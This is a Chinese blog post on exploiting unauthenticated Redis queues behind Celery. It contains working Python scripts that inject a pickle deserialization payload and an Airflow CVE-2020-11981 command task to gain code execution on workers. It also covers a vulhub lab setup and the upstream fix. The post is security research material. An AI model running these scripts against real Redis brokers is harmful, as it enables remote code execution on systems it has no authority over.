Celery Redis未授权访问命令执行利用

最新推荐文章于 2023-03-06 13:54:01 发布
最新推荐文章于 2023-03-06 13:54:01 发布
阅读量7.1k 收藏
点赞数 1
分类专栏: 安全 Python 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fnmsd/article/details/118575254
版权

在这里插入图片描述
首发补天社区:https://forum.butian.net/share/224←走过路过帮点一下~

前言

Celery 是一个简单、灵活且可靠的分布式系统,用于处理大量消息,同时为操作提供维护此类系统所需的工具。它是一个专注于实时处理的任务队列,同时也支持任务调度。

前段时间碰到个未授权的Redis,看里面的数据是作为Celery的任务队列使用,所以想研究下这种情况应该如何进行利用。

目前能够想到的利用有两种:

  1. 任务信息序列化使用pickle模式,利用python反序列化漏洞进行利用
  2. 找到可以执行任意命令、代码、函数的Task,下发该Task任务

本文只讨论Redis,使用其他AMQP(ActiveMQ、RabbitMQ等等)应该也是同理。

相关环境已经给vulhub提了PR,后续可以从vulhub上布置环境进行体验。

目前celery3.1.x的环境已经合进去了:

https://github.com/vulhub/vulhub/tree/master/celery/celery3_redis_unauth

Celery的任务Serializer

有个比较有意思的地方:3.1.x最后一个版本为3.1.26,在README中说明下一个版本为3.2,结果3.1.x之后的版本,直接变成4.0.

task_serializer4.0之前默认为pickle,之后为json
result_serializer4.0之前默认为pickle,之后为json
event_serializer只接受JSON

Celery < 4.0的利用(Pickle反序列化利用)

由于Celery < 4.0的情况下,默认的task_serializer为pickle,可以直接利用pickle反序列化漏洞进行利用。

(如果对方取result的话,也可在取result处进行覆盖利用)

本章以Celery3.1.23为例进行利用。

写一个最简单的Task:

from celery import Celery
app = Celery('tasks', broker='redis://redis/0')
@app.task
def add(x, y):
    return x + y

Celery使用的默认队列名为celery,在Redis中表现为db中存在一个key为celery的List(存在未消费的任务时存在):

在无Worker的情况下启动任务:

在这里插入图片描述

可以看到名为celery的key,以及其中内容,body为base64后的pickle序列化内容。

在这里插入图片描述

**Tips:**可以通过以_kumbu.bind.为前缀的key,确定都有哪些队列,这个是Kombu的一个命名规范

Celery的具体任务消息结果可以参考官方文档,此处不做详细讨论:

https://docs.celeryproject.org/en/stable/internals/protocol.html

Celery使用Kombu这个AMQP实现进行任务的下发与拉取,这里不分析详细逻辑,直接拿出队列内容,写一个简单的利用脚本(执行touch /tmp/celery_success命令),将body内容替换为命令执行的pickle数据:

import pickle
import json
import base64
import redis
#redis连接
r = redis.Redis(host='localhost', port=6379, decode_responses=True,db=0) 
#队列名
queue_name = 'celery'
ori_str="{\"content-type\": \"application/x-python-serialize\", \"properties\": {\"delivery_tag\": \"16f3f59d-003c-4ef4-b1ea-6fa92dee529a\", \"reply_to\": \"9edb8565-0b59-3389-944e-a0139180a048\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"delivery_info\": {\"routing_key\": \"celery\", \"priority\": 0, \"exchange\": \"celery\"}, \"correlation_id\": \"6e046b48-bca4-49a0-bfa7-a92847216999\"}, \"headers\": {}, \"content-encoding\": \"binary\", \"body\": \"gAJ9cQAoWAMAAABldGFxAU5YBQAAAGNob3JkcQJOWAQAAABhcmdzcQNLZEvIhnEEWAMAAAB1dGNxBYhYBAAAAHRhc2txBlgJAAAAdGFza3MuYWRkcQdYAgAAAGlkcQhYJAAAADZlMDQ2YjQ4LWJjYTQtNDlhMC1iZmE3LWE5Mjg0NzIxNjk5OXEJWAgAAABlcnJiYWNrc3EKTlgJAAAAdGltZWxpbWl0cQtOToZxDFgGAAAAa3dhcmdzcQ19cQ5YBwAAAHRhc2tzZXRxD05YBwAAAHJldHJpZXNxEEsAWAkAAABjYWxsYmFja3NxEU5YBwAAAGV4cGlyZXNxEk51Lg==\"}"
task_dict = json.loads(ori_str)
command = 'touch /tmp/celery_success'
class Person(object):
    def __reduce__(self):
    	return (__import__('os').system, (command,))
pickleData = pickle.dumps(Person())
task_dict['body']=base64.b64encode(pickleData).decode()
print(task_dict)
r.lpush(queue_name,json.dumps(task_dict))

执行之后,可以看到Celery Worker所在console有如下报错:

在这里插入图片描述

继续查看tmp目录,可以看到文件创建成功:
在这里插入图片描述

Celery 4.0之后的利用

Celery 4.0之后,默认的任务消息序列化方式由Pickle改为了JSON,无法直接再利用Pickle反序列化。

配置了CELERY_ACCEPT_CONTENT支持Pickle

Celery4.0之后,如果直接使用上面的脚本会有如下拒绝反序列化的提示:

在这里插入图片描述

实际上在celery 3.1.X后面的版本在启动worker时,会有个提示:如果3.2之后的版本(实际上是4.0),需要配置启动CELERY_ACCEPT_CONTENT选项来启动worker的pickle支持。

在这里插入图片描述

添加CELERY_ACCEPT_CONTENT配置,即可如4.0版本前一样进行利用:

app.conf['CELERY_ACCEPT_CONTENT'] = ['pickle', 'json', 'msgpack', 'yaml']

Apache Airflow的CeleryExecutor利用

CVE-2020-11981是利用Airflow的CeleryExecutor类来进行命令执行,可利用版本小于1.10.10,

当airflow使用CeleryExecutor进行执行时,会启动celery作为任务调度,Celery Worker中可执行airflow.executors.celery_executor.execute_command方法任务,具体代码看最后的diff图片。

execute_command就属于开始说的第二种,可以执行任意命令的task.

写入一个JSON任务消息执行airflow.executors.celery_executor.execute_command到airflow的celery redis队列中,此处注意队列名为default:

import pickle
import json
import base64
import redis
r = redis.Redis(host='localhost', port=6379, decode_responses=True,db=0) 
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"
task_dict = json.loads(ori_str)
command = ['touch', '/tmp/airflow_success']
body=[[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
task_dict['body']=base64.b64encode(json.dumps(body)).decode()
print(task_dict)
r.lpush(queue_name,json.dumps(task_dict))

Airflow的worker日志:

在这里插入图片描述

worker所在docker的tmp目录中出现airflow_success文件:

在这里插入图片描述

修复后只允许数组前三位为[“airflow”, “tasks”, “run”],提交如下,后续改为单独抽出一个validate函数,用于多处的命令执行检测:

在这里插入图片描述

结语

Celery 4.0以上暂未找到更好的利用方法,等找到以后再发吧。

参考

https://docs.celeryproject.org/en/stable/userguide/configuration.html

https://www.bookstack.cn/read/celery-3.1.7-zh/8d5b10e3439dbe1f.md#dhfmrk

https://docs.celeryproject.org/en/stable/userguide/calling.html#serializers

https://www.jianshu.com/p/52552c075bc0

https://www.runoob.com/w3cnote/python-redis-intro.html

https://blog.csdn.net/SKI_12/article/details/85015803

https://nvd.nist.gov/vuln/detail/CVE-2020-11981

https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E

fnmsd
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[ vulhub漏洞复现篇 ] Celery <4.0 Redis授权访问+Pickle反序列化利用
qq_51577576的博客
10-04 1577
[ vulhub漏洞复现篇 ] Celery <4.0 Redis授权访问+Pickle反序列化利用 Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。这里我们使用redis的队列服务
Celery 4.0 Redis授权访问+Pickle反序列化利用celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用celery3_redis_unauth)exploit Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。
redis反序列化问题 missing type id property ‘@class‘
aayygg1234的专栏
03-06 4467
redis反序列化问题 com.fasterxml.jackson.databind.exc.InvalidTypeIdException: Missing type id when trying to resolve subtype of [simple type, class java.lang.Object]: missing type id property '@class'
Celery的安装和简单使用(Redis作为消息中间件)
bitcsljl的博客
09-21 1583
Celery的安装和简单应用(Redis作为消息中间件)
redis授权访问漏洞三种提权方式
FryhRx的博客
04-10 8322
redis授权访问漏洞三种提权方式 文章目录redis授权访问漏洞三种提权方式前言一、redis是什么?二、漏洞利用条件1. redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。2.没有设置密码认证(一般为空),可以免密码远程登录redis服务。三、漏洞利用1、利用redis写webshell2、写ssh-keygen公钥然后使用私钥登陆3、Redis 写入计划任务四、 Redis授权访问防御方法 前言 扫描/连接默认的63
celery分布式任务队列从入门到精通
大帅的博客
09-10 1457
1. Celery简介 Celery是由纯python编写的,但是协议可以用任何语言实现。目前,已有Ruby实现的RCelery、Node.js实现的node-celery及一个PHP客户端,语言互通也可以通过using webhooks实现。在使用Celery之前,我们先来了解以下几个概念: 任务队列:简单来说,任务队列就是存放着任务的队列,客户端将要执行的任务的消息放入任务队列中,执行节点worker进行持续监视队列,如果有新任务,就取出来执行该任务。这种机制就像生产者消、费者模型一...
【vulhub】Celery 漏洞 Redis授权访问命令执行利用
qq_45300786的博客
09-13 760
这个exp楼主目前还不会改,所以只能执行touch /tmp/celery_success 等哪天楼主把python的pickle的序列化研究会了,再来更新其他命令。 参考: https://blog.csdn.net/fnmsd/article/details/118575254
redis 之 auth
01-20 916
Redis之auth   redis服务器才开始的时候,是没有密码验证的, 只有在配置文件--redis.conf 中,将requirepass的注释去掉,才会有进行验证的 e.g.1          此处需要注意的是,这个文件的位置,当你安装后却不知道,redis.conf的位置的时候,可以用下面的命令来找到redis.conf的位置 sudo find  / -name
攻防_漏洞_Redis授权
redglare的博客
01-11 1618
原文链接:http://www.cnblogs.com/bmjoker/p/9548962.html 一、漏洞简介以及危害: 1.什么是redis授权访问漏洞: Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在
django celery redis使用具体实践
12-31
环境准备 python3.5.4 windows redis ...# celery中间人 redis://redis服务所在的ip地址:端口/数据库号 BROKER_URL = 'redis://127.0.0.1:6379/0' # celery结果返回,可用于跟踪结果 CELERY_RESULT_
Django使用Celeryredis执行异步任务的实例内容
09-08
在本篇文章里小编给大家整理的是关于Django使用Celeryredis执行异步任务,需要的朋友们可以学习下。
Redis 不使用 keys 命令获取键值信息的方法
12-16
这个问题可能看起来很奇怪,但很多 redis 集群会有一个统一的入口,入口会作兼容 redis 命令的代理,一般出于新能考虑是禁止使用 keys 命令来获取键值信息的,但是可以通过 scan 命令来代替 keys 2. 使用 keys 的...
celery java_celery消息的编码和序列化(转)
weixin_39564151的博客
12-22 423
add by zhj:原文讲的是序列化时的安全问题,不过,我关心的是怎样可以看到消息队列中的数据。下面是在broker中看到的消息,body是先用body_encoding编码,然后用content-type进行序列化后得到的,'application/x-python-serialize'指的是pickle,用pickle.loads(body.decode('base64'))就可以看到原始的...
基于请求/响应对象搜索的Java中间件通用回显方法(针对HTTP)
热门推荐
fnmsd的博客
06-12 1万+
先感谢一下scz大佬给的博客推荐,受宠若惊+10086。 心血来潮有这么个想法,验证一下。 前言 看了很多师傅们在研究针对Java中间件+Java反序列化回显的研究: https://xz.aliyun.com/t/7740 https://xz.aliyun.com/t/7348 https://paper.seebug.org/1233/ (。。。应该还有挺多,就不翻了) 又看到了c0ny1师傅的作品:《java内存对象搜索辅助工具》 配合IDEA在Java应用运行时,对内存中的对象进行搜
《A Saga of Code Executions on Zimbra》RCE漏洞分析+复现过程
fnmsd的博客
03-21 1万+
原文地址: https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html https://paper.tuisec.win/detail/8ac5a3d1efbf40b 下载Zimbra的包: 1.从地址https://www.zimbra.com/downloads/zimbra-collaboration-ope...
Java中间件通用回显方法的问题及处理(7.7更新)
fnmsd的博客
06-21 1万+
之前写的《基于请求/响应对象搜索的Java中间件通用回显方法(针对HTTP)》实际使用情况中会有问题。 目前解决: 1.没有回显/高并发时才有回显 2.Tomcat回显不稳定 3.URLClassLoader加载问题 4.BasicDataSource利用链问题
MySQL JDBC 客户端反序列化漏洞分析
fnmsd的博客
05-20 9999
首发安全客:https://www.anquanke.com/post/id/203086 这几天学习了BlackHat Europe 2019的议题《New Exploit Technique In Java Deserialization Attack》, 膜拜师傅们的同时,做一个简单的漏洞分析。 该漏洞需要能够控制客户端的JDBC连接串,在连接阶段即可触发,无需继续执行SQL语句。 测试代码 需要自行根据版本选择JDBC连接串,最后有基于各版本Connector连接串的总结。 public clas
MySQL JDBC Connector的allowUrlInLocalInfile选项利用
fnmsd的博客
06-01 9931
MySQL JDBC Connector的allowUrlInLocalInfile选项,开启时可以进行SSRF及列目录。客户端文件读取利用的扩展。
修改ysoserial使其支持生成代码执行Payload
fnmsd的博客
03-13 9874
ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。 https://github.com/frohoff/ysoserial 一般该工具可生成执行任意命令的序列化对象,通过对工具代码进行简单修改,也可使其执行任意的Java代码,以此来绕过对命令执行的限制。 修改 作者在115行的注释写到: TODO: could also do...
celery redis集群
最新发布
03-28
Celery是一个Python分布式任务队列框架,而Redis是一个高性能的键值存储数据库。当它们结合在一起时,可以构建一个强大的分布式任务队列系统。 CeleryRedis集群的结合可以提供以下功能: 1. 异步任务处理:Celery可以将任务异步地发送到Redis集群中,然后由工作节点处理。这样可以避免任务阻塞主线程,提高系统的响应速度。 2. 分布式任务调度:Redis集群可以作为Celery的消息代理,负责存储和传递任务消息。多个Celery工作节点可以从Redis集群中获取任务,并进行并行处理。 3. 任务结果存储:Celery可以将任务的执行结果存储在Redis集群中,以便后续查询和使用。 4. 任务队列监控:Redis集群可以提供监控和管理Celery任务队列的功能,例如查看队列长度、清理过期任务等。 为了搭建CeleryRedis集群,你需要进行以下步骤: 1. 安装和配置Redis集群:根据你的需求,可以选择使用Redis Sentinel或Redis Cluster来搭建Redis集群。配置好集群后,确保所有节点都正常运行。 2. 安装和配置Celery:使用pip安装Celery库,并在Celery配置文件中指定Redis集群的连接信息。 3. 编写任务代码:定义你的任务函数,并使用Celery的装饰器将其注册为Celery任务。 4. 启动Celery工作节点:在每个工作节点上启动Celery的工作进程,它们将从Redis集群中获取任务并执行。 5. 发布和调度任务:在你的应用程序中,使用Celery的API将任务发布到Redis集群中,并设置任务的调度规则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值